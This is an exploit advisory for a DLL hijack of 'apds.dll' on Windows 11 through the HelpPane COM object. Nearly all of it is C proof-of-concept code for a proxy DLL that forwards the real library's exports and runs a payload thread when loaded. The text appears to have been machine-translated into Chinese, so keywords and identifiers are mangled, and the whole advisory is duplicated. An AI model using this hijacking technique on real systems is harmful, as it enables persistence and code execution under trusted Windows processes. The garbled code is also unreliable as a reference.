#--------------------------------------------------------------------------------------------------
#title: Microsoft Windows 11-'apds.dll'dll劫持(强制)
#日期: 2023-09-01
#作者: Moein Shahabi
#vendor: https://www.microsoft.com
#版本: Windows 11 Pro 10.0.22621
#测试在: Windows 11_x64 [ENG]
#--------------------------------------------------------------------------------------------------
Description:
helppane对象允许我们强迫Windows 11劫持劫持
说明:
1。编译DLL
2。复制“ C: \ Windows \'目录
3。启动CMD并执行以下命令来测试Helppane对象'[System.Activator] :CreateinStance([类型:GetTypefromClsid)
4。
----- code_poc -------------------
#pragma一次
#include windows.h
//线程启动时执行的功能
外部'C'__declSpec(dllexport)
dword winapi messageboxthread(lpvoid lpparam){
MessageBox(null,l'dll劫持!',l'dll劫持!',null);
返回0;
}
pbyte AllocateUsableMemory(pbyte baseaddress,dword size,dword protection=page_readwrite){
#IFDEF _WIN64
pimage_dos_header dosheader=(pimage_dos_header)baseaddress;
pimage_nt_headers ntheaders=(pimage_nt_headers)(((pbyte)dosheader + dosheader-e_lfanew);
pimage_optional_header optionalheader=ntheaders-optionalheader;
//创建一些呼吸室
baseaddress=baseaddress + optionalheader-sizeOfimage;
for(pbyte offset=baseaddress; offset baseaddress + maxdword; offset +=1024 * 8){
pbyte有用=(pbyte)virtualalloc(
抵消,
尺寸,
mem_reserve | mem_commit,
保护);
if(usuable){
Zeromemory(可用,大小); //不确定是否需要
返回用途;
}
}
#别的
//x86我们在哪里分配都没关系
pbyte有用=(pbyte)virtualalloc(
无效的,
尺寸,
mem_reserve | mem_commit,
保护);
if(usuable){
Zeromemory(可用,大小);
返回用途;
}
#endif
返回0;
}
Bool ProxyExports(Hmodule Ourbase,Hmodule TargetBase)
{
#IFDEF _WIN64
BYTE JMPPREFIX []={0x48,0xB8}; //mov rax addr
BYTE JMPSUFFIX []={0xff,0xe0}; //JMP RAX
#别的
字节jmpprefix []={0xb8}; //mov eax addr
BYTE JMPSUFFIX []={0xff,0xe0}; //JMP EAX
#endif
pimage_dos_header dosheader=(pimage_dos_header)targetbase;
pimage_nt_headers ntheaders=(pimage_nt_headers)(((pbyte)dosheader + dosheader-e_lfanew);
pimage_optional_header optionalheader=ntheaders-optionalheader;
pimage_data_directory exportDatAdirectory=optionalheader-datadirectory [image_directory_entry_export];
if(ExportDataDirectory-size==0)
返回false; //无需前进
pimage_export_directory targetExportDirectory=(pimage_export_directory)((pbyte)dosheader + exportDatadaDirectory-virtualAddress);
如果(targetExportDirectory-numberoffunctions!=targetExportDirectory-numberofnames)
返回false; //TODO:增加对混合序列的DLL的支持
dosheader=(pimage_dos_header)ourbase;
ntheaders=(pimage_nt_headers)(((pbyte)dosheader + dosheader-e_lfanew);
optionalheader=ntheaders-optionalheader;
exportDatadirectory=optionalheader-datadirectory [image_directory_entry_export];
if(ExportDataDirectory-size==0)
返回false; //我们的dll破坏了
pimage_export_directory outexportDirectory=(pimage_export_directory)((pbyte)dosheader + exportDatadAdaDirectory-virtualAddress);
//---------------------------------------------------------
//将当前的标头数据RW用于重定向
dword oldProtect=0;
if(!virtualProtect(
我们的ExportDirectory,
64,page_readwrite,
oldProtect)){
返回false;
}
dword totalallocationsize=0;
//添加跳跃的大小
TotalAlcationSize +=targetExportDirectory-numberforctions *(sizeof(jmpprefix) + sizeof(jmpsuffix) + sizeof(lpvoid));
//添加功能表的大小
Total Allacationsize +=targetExportDirectory-numberfumctions * sizeof(int);
//添加名称的总大小
Pint targetDressofnames=(pint)(((PBYTE)targetBase + TargetExportDirectory-addressofnames);
对于(dword i=0; i targetExportDirectory-numberofnames; i ++)
TotalAlcationSize +=(dword)strlen(((((lpcstr))(((pbyte)targetBase + targetAddressofnames )))) + 1;
//添加名称表的大小
Total Allacationsize +=targetExportDirectory-numberofnames * sizeof(int);
//添加序数的大小:
Total Allocationsize +=targetExportDirectory-numberEffunctions * sizeof(ushort);
//为重建的导出数据分配常规记忆
pbyte exportData=allocateUsableMemory(((pbyte)ourbase,totalallocationsize,page_readwrite);
如果(!exportdata)
返回false;
pbyte sideAllocation=exportData; //稍后用于虚拟protect
//复制功能表
Pint NewFunctionTable=(Pint)ExportData;
copymemory(newFunctionTable,(pbyte)targetBase + targetExportDirectory-addressofnames,targetExportDirectory-numberoffunctions * sizeof(int));
exportData +=target exportDirectory-numberfumctions * sizeof(int);
OurexportDirectory -addressOffunctions=(dword)(((pbyte)newFunctionTable-(PBYTE)OURBASE);
//在新功能表中编写JMP并更新RVA
Pint targetAddressoffunctions=(pint)(((pbyte)targetBase + targetExportDirectory-addressOffunctions);
对于(dword i=0; i targetExportDirectory-numberoffunctions; i ++){
newFunctionTable =(dword)(exportdata-(pbyte)ourbase);
copymemory(exportdata,jmpprefix,sizeof(jmpprefix));
exportData +=sizeof(jmpprefix);
pbyte realAddress=(pbyte)(((pbyte)targetBase + targetDressoffunctions );
copymemory(exportdata,realaddress,sizeof(lpVoid));
exportData +=sizeof(lpVoid);
copymemory(exportdata,jmpsuffix,sizeof(jmpsuffix));
exportData +=sizeof(jmpsuffix);
}
//复制名称RVA表
品脱newNameTable=(pint)exportdata;
copymemory(newNameTable,(pbyte)targetbase + targetExportDirectory-addressofnames,targetExportDirectory-numberofnames * sizeof(dword));
exportData +=targetExportDirectory-numberofnames * sizeof(dword);
OurexportDirectory -addressofnames=(dword)(((PBYTE)newnameTable-(PBYTE)OURBASE);
//复制名称,然后将三角洲应用于新名称表中的所有RVA
对于(dword i=0; i targetExportDirectory-numberofnames; i ++){
pbyte realAddress=(pbyte)(((pbyte)targetBase + targetDressofnames );
dword length=(dword)strlen(((lpcstr)realAddress);
copymemory(exportdata,realaddress,length);
newNameTable =(dword)(((pbyte)exportdata-(pbyte)ourbase);
导出+=长度+ 1;
}
//复制顺序表
Pint Newordinaltable=(Pint)ExportData;
copymemory(newordinaltable,(pbyte)targetbase + targetExportDirectory-addressofnameOdninals,targetExportDirectory-numberfumctions * sizeof(ushort));
exportData +=targetExportDirectory-numberoffunctions * sizeof(ushort);
OurexportDirectory -addressofnameOdninals=(dword)(((pbyte)newordinaltable-(pbyte)ourbase);
//保持我们的计数
我们的ExportDirectory-numberoffunctions=targetExportDirectory-numberfunctions;
我们的ExportDirectory-numberofnames=targetExportDirectory-numberofnames;
if(!virtualProtect(
我们的ExportDirectory,
64,OldProtect,
oldProtect)){
返回false;
}
if(!virtualProtect(
侧球,
完全合并,
page_execute_read,
oldProtect)){
返回false;
}
返回true;
}
//加载DLL时执行(传统上或通过反射注射)
Bool Apientry dllmain(hmodule hmodule,
dword ul_reason_for_call,
LPVOID LPREDER
)
{
hmodule realdll;
开关(ul_reason_for_call)
{
CASE DLL_PROCESS_ATTACH:
createThread(null,null,MessageBoxThread,null,null,null);
realdll=loadLibrary(l'C: \\ Windows \\ System32 \\ apds.dll');
如果(realldll)
proxyexports(hmodule,readlll);
CASE DLL_THREAD_ATTACH:
CASE DLL_THREAD_DETACH:
CASE DLL_PROCESS_DETACH:
休息;
}
返回true;
}
--------------------------------------------------
#title: Microsoft Windows 11-'apds.dll'dll劫持(强制)
#日期: 2023-09-01
#作者: Moein Shahabi
#vendor: https://www.microsoft.com
#版本: Windows 11 Pro 10.0.22621
#测试在: Windows 11_x64 [ENG]
#--------------------------------------------------------------------------------------------------
Description:
helppane对象允许我们强迫Windows 11劫持劫持
说明:
1。编译DLL
2。复制“ C: \ Windows \'目录
3。启动CMD并执行以下命令来测试Helppane对象'[System.Activator] :CreateinStance([类型:GetTypefromClsid)
4。
----- code_poc -------------------
#pragma一次
#include windows.h
//线程启动时执行的功能
外部'C'__declSpec(dllexport)
dword winapi messageboxthread(lpvoid lpparam){
MessageBox(null,l'dll劫持!',l'dll劫持!',null);
返回0;
}
pbyte AllocateUsableMemory(pbyte baseaddress,dword size,dword protection=page_readwrite){
#IFDEF _WIN64
pimage_dos_header dosheader=(pimage_dos_header)baseaddress;
pimage_nt_headers ntheaders=(pimage_nt_headers)(((pbyte)dosheader + dosheader-e_lfanew);
pimage_optional_header optionalheader=ntheaders-optionalheader;
//创建一些呼吸室
baseaddress=baseaddress + optionalheader-sizeOfimage;
for(pbyte offset=baseaddress; offset baseaddress + maxdword; offset +=1024 * 8){
pbyte有用=(pbyte)virtualalloc(
抵消,
尺寸,
mem_reserve | mem_commit,
保护);
if(usuable){
Zeromemory(可用,大小); //不确定是否需要
返回用途;
}
}
#别的
//x86我们在哪里分配都没关系
pbyte有用=(pbyte)virtualalloc(
无效的,
尺寸,
mem_reserve | mem_commit,
保护);
if(usuable){
Zeromemory(可用,大小);
返回用途;
}
#endif
返回0;
}
Bool ProxyExports(Hmodule Ourbase,Hmodule TargetBase)
{
#IFDEF _WIN64
BYTE JMPPREFIX []={0x48,0xB8}; //mov rax addr
BYTE JMPSUFFIX []={0xff,0xe0}; //JMP RAX
#别的
字节jmpprefix []={0xb8}; //mov eax addr
BYTE JMPSUFFIX []={0xff,0xe0}; //JMP EAX
#endif
pimage_dos_header dosheader=(pimage_dos_header)targetbase;
pimage_nt_headers ntheaders=(pimage_nt_headers)(((pbyte)dosheader + dosheader-e_lfanew);
pimage_optional_header optionalheader=ntheaders-optionalheader;
pimage_data_directory exportDatAdirectory=optionalheader-datadirectory [image_directory_entry_export];
if(ExportDataDirectory-size==0)
返回false; //无需前进
pimage_export_directory targetExportDirectory=(pimage_export_directory)((pbyte)dosheader + exportDatadaDirectory-virtualAddress);
如果(targetExportDirectory-numberoffunctions!=targetExportDirectory-numberofnames)
返回false; //TODO:增加对混合序列的DLL的支持
dosheader=(pimage_dos_header)ourbase;
ntheaders=(pimage_nt_headers)(((pbyte)dosheader + dosheader-e_lfanew);
optionalheader=ntheaders-optionalheader;
exportDatadirectory=optionalheader-datadirectory [image_directory_entry_export];
if(ExportDataDirectory-size==0)
返回false; //我们的dll破坏了
pimage_export_directory outexportDirectory=(pimage_export_directory)((pbyte)dosheader + exportDatadAdaDirectory-virtualAddress);
//---------------------------------------------------------
//将当前的标头数据RW用于重定向
dword oldProtect=0;
if(!virtualProtect(
我们的ExportDirectory,
64,page_readwrite,
oldProtect)){
返回false;
}
dword totalallocationsize=0;
//添加跳跃的大小
TotalAlcationSize +=targetExportDirectory-numberforctions *(sizeof(jmpprefix) + sizeof(jmpsuffix) + sizeof(lpvoid));
//添加功能表的大小
Total Allacationsize +=targetExportDirectory-numberfumctions * sizeof(int);
//添加名称的总大小
Pint targetDressofnames=(pint)(((PBYTE)targetBase + TargetExportDirectory-addressofnames);
对于(dword i=0; i targetExportDirectory-numberofnames; i ++)
TotalAlcationSize +=(dword)strlen(((((lpcstr))(((pbyte)targetBase + targetAddressofnames )))) + 1;
//添加名称表的大小
Total Allacationsize +=targetExportDirectory-numberofnames * sizeof(int);
//添加序数的大小:
Total Allocationsize +=targetExportDirectory-numberEffunctions * sizeof(ushort);
//为重建的导出数据分配常规记忆
pbyte exportData=allocateUsableMemory(((pbyte)ourbase,totalallocationsize,page_readwrite);
如果(!exportdata)
返回false;
pbyte sideAllocation=exportData; //稍后用于虚拟protect
//复制功能表
Pint NewFunctionTable=(Pint)ExportData;
copymemory(newFunctionTable,(pbyte)targetBase + targetExportDirectory-addressofnames,targetExportDirectory-numberoffunctions * sizeof(int));
exportData +=target exportDirectory-numberfumctions * sizeof(int);
OurexportDirectory -addressOffunctions=(dword)(((pbyte)newFunctionTable-(PBYTE)OURBASE);
//在新功能表中编写JMP并更新RVA
Pint targetAddressoffunctions=(pint)(((pbyte)targetBase + targetExportDirectory-addressOffunctions);
对于(dword i=0; i targetExportDirectory-numberoffunctions; i ++){
newFunctionTable =(dword)(exportdata-(pbyte)ourbase);
copymemory(exportdata,jmpprefix,sizeof(jmpprefix));
exportData +=sizeof(jmpprefix);
pbyte realAddress=(pbyte)(((pbyte)targetBase + targetDressoffunctions );
copymemory(exportdata,realaddress,sizeof(lpVoid));
exportData +=sizeof(lpVoid);
copymemory(exportdata,jmpsuffix,sizeof(jmpsuffix));
exportData +=sizeof(jmpsuffix);
}
//复制名称RVA表
品脱newNameTable=(pint)exportdata;
copymemory(newNameTable,(pbyte)targetbase + targetExportDirectory-addressofnames,targetExportDirectory-numberofnames * sizeof(dword));
exportData +=targetExportDirectory-numberofnames * sizeof(dword);
OurexportDirectory -addressofnames=(dword)(((PBYTE)newnameTable-(PBYTE)OURBASE);
//复制名称,然后将三角洲应用于新名称表中的所有RVA
对于(dword i=0; i targetExportDirectory-numberofnames; i ++){
pbyte realAddress=(pbyte)(((pbyte)targetBase + targetDressofnames );
dword length=(dword)strlen(((lpcstr)realAddress);
copymemory(exportdata,realaddress,length);
newNameTable =(dword)(((pbyte)exportdata-(pbyte)ourbase);
导出+=长度+ 1;
}
//复制顺序表
Pint Newordinaltable=(Pint)ExportData;
copymemory(newordinaltable,(pbyte)targetbase + targetExportDirectory-addressofnameOdninals,targetExportDirectory-numberfumctions * sizeof(ushort));
exportData +=targetExportDirectory-numberoffunctions * sizeof(ushort);
OurexportDirectory -addressofnameOdninals=(dword)(((pbyte)newordinaltable-(pbyte)ourbase);
//保持我们的计数
我们的ExportDirectory-numberoffunctions=targetExportDirectory-numberfunctions;
我们的ExportDirectory-numberofnames=targetExportDirectory-numberofnames;
if(!virtualProtect(
我们的ExportDirectory,
64,OldProtect,
oldProtect)){
返回false;
}
if(!virtualProtect(
侧球,
完全合并,
page_execute_read,
oldProtect)){
返回false;
}
返回true;
}
//加载DLL时执行(传统上或通过反射注射)
Bool Apientry dllmain(hmodule hmodule,
dword ul_reason_for_call,
LPVOID LPREDER
)
{
hmodule realdll;
开关(ul_reason_for_call)
{
CASE DLL_PROCESS_ATTACH:
createThread(null,null,MessageBoxThread,null,null,null);
realdll=loadLibrary(l'C: \\ Windows \\ System32 \\ apds.dll');
如果(realldll)
proxyexports(hmodule,readlll);
CASE DLL_THREAD_ATTACH:
CASE DLL_THREAD_DETACH:
CASE DLL_PROCESS_DETACH:
休息;
}
返回true;
}
--------------------------------------------------